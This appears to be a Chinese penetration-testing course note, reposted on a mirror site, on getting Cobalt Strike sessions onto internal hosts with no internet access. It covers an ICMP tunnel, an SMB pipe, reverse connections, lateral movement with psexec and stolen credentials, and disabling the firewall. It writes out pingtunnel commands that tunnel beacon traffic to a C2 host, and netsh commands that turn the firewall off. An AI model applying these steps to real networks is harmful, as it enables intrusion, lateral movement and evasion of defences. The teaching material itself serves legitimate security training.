当前位置: 首页 > news >正文

二级域名网站怎么做培训前端网站开发

二级域名网站怎么做,培训前端网站开发,视频制作报价表,网站技术如何策划知识点 #知识点: 1、入站规则不出网上线方案 2、出站规则不出网上线方案 3、规则-隧道技术-SMB&ICMP-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) -代理技术:解决网络通讯不通的问题&#xff0…

在这里插入图片描述

在这里插入图片描述

知识点

#知识点:
1、入站规则不出网上线方案
2、出站规则不出网上线方案
3、规则-隧道技术-SMB&ICMP-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
-连接方向:正向&反向(基础课程有讲过)#系列点:
1、判断什么时候用代理
2、判断什么时候用隧道
3、判断出网和不出网协议
4、如何使用代理建立节点并连接
5、如何使用隧道技术封装协议上线
6、判断哪些代理或隧道情况选择放弃

演示案例

1、不出网-控制上线-CS-反向连接2、不出网-控制上线-CS-SMB隧道(使用SMB隧道普通用户是不行的,需要提权)3、不出网-控制上线-CS-ICMP隧道4、不出网-控制上线-CS-关闭防火墙
入站过滤上线:
1、隧道技术正向硬刚
2、反向连接跳过
3、关闭&删除&替换
适用利用入站通行拿到的高权限出站过滤上线:
1、隧道技术反向硬刚
2、正向连接跳过
3、关闭&删除&替换
适用利用入站通行拿到的高权限采用第三种方案:防火墙开关,删除规则,替换程序
适用于:
1、单纯的内网环境
2、单纯的内网域环境(域控没有设置组策略防火墙同步)隧道技术上线:
HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等
除去SMB隧道,其他隧道技术大部分针对的出站策略绕过
ICMP
./pingtunnel -type server
肉鸡:(管理器运行)
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.22.130 -t 192.168.22.130:3344 -tcp 1 -noprint 1 -nolog 1
CS:
监听器1:127.0.0.1 3333
监听器2:192.168.22.130 3344
生成监听器1的Stager后门肉鸡执行Windows防火墙命令:
https://www.cnblogs.com/tomtellyou/p/16300557.html
查看当前防火墙状态:netsh advfirewall show allprofiles
关闭防火墙:netsh advfirewall set allprofiles state off
开启防火墙:netsh advfirewall set allprofiles state on
恢复初始防火墙设置:netsh advfirewall reset
启用桌面防火墙: netsh advfirewall set allprofiles state on
设置默认输入和输出策略:netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
如果设置为拒绝使用blockinbound,blockoutbound

在这里插入图片描述

总结

拓扑图:在前一次的基础上,win2008做了入站限制(只让访问Web服务),win2012也做了入站限制(只让访问打印机)思路:
win7还是有外网出口的,正向tcp/反向tcp都能直接拿下;拿下win7后,生成正向tcp,让win7主动连接拿下win10(也可以反向,但需要在win7的11网卡上设置监听器,转发上线win10);拿下win10后,这时想再用正向tcp拿下win2008已经不行了,因为win2008入站只让访问Web服务,可以考虑以下几种方法:
1.隧道技术正向硬刚(可以用icmp隧道,因为icmp是网络层协议,web服务属于应用层)
2.反向连接跳过(在win10的22网卡上设置监听器,转发上线win2008)
3.关闭&删除&替换(即使用命令关闭防火墙、删除策略、替换白名单策略所指向的exe指向木马,但是有限制条件)拿下win2008后,使用tcp反向连接拿下win2012是不行的,因为tcp反向连接的流量到win2008时属于入站,而其做了入站限制。
同样,正向tcp肯定也是不行的,因为win2012限制了只能访问打印机。
现在的思路是:隧道技术正向硬刚(可以用SMB隧道,打印机一般都开有445端口)
需要在cs上创建smb的监听器,即smb管道,然后配合横向移动手段,比如用cs在win2008上扫描33网段存活主机,
扫到win2012后,右键其选择"横向移动" - "psexec64" - "输入前期信息收集到的用户名密码" - "监听器选择smb的监听器" - "会话选择win2008的33网段"
总的意思就是用win2008的会话进行smb的横向移动,拿下win2012
http://www.yayakq.cn/news/502817/

相关文章:

  • 怎么创个网站网站安全建设论文
  • 专业建网站价格企业为什么要ipo
  • 被墙的网站有哪些vivo系统最新版本
  • 服务器网站建设实训报告网络营销有哪些推广方法
  • 怎么弄百度网站华侨城网站建设
  • 广汉市建设局官方网站资源网站后台系统
  • 小说网站排名人气广东公布最新传染了
  • 陕西营销型手机网站做网站开发有前途么
  • 嘉兴做网站的公司南京网站优化推广
  • 网站后台无法上传照片joomla做类似赶集网的网站
  • 成都微信网站建设公网站制作怎么做
  • 能盈利的网站做网站用什么字体最明显
  • 天津建设厅官方网站wordpress怎么用panel
  • 临沂法律网站开发公司邮箱检测网站
  • 做学校网站的目的是什么wordpress内页无法打开
  • 奉节网站建设室内设计培训机构排名前十
  • 企业网站策划书1000字产品软文怎么写
  • 做门窗的 在哪个网站跑业务跑业务网站后台密码
  • 怎么做免费的网站推广live wordpress主题
  • 平邑网站优化国内html5网站案例
  • 手表价格网站企业负责人电话名录
  • 做企业网站需要准备什么资料重庆公众号开发服务
  • 福建龙泉建设有限公司网站制作网站用c 做前台
  • 如何网站做百度推广江西数据平台网站建设
  • 沂南建设局网站wordpress白屏
  • 微信支付 企业网站微信公众号服务平台电话
  • 肇庆企业做网站wordpress更新文章
  • 网站建设费科目中英文对照网站怎么做
  • 网站域名和密码多少钱用英语怎么说
  • 手机网站模板案例旗袍网页制作模板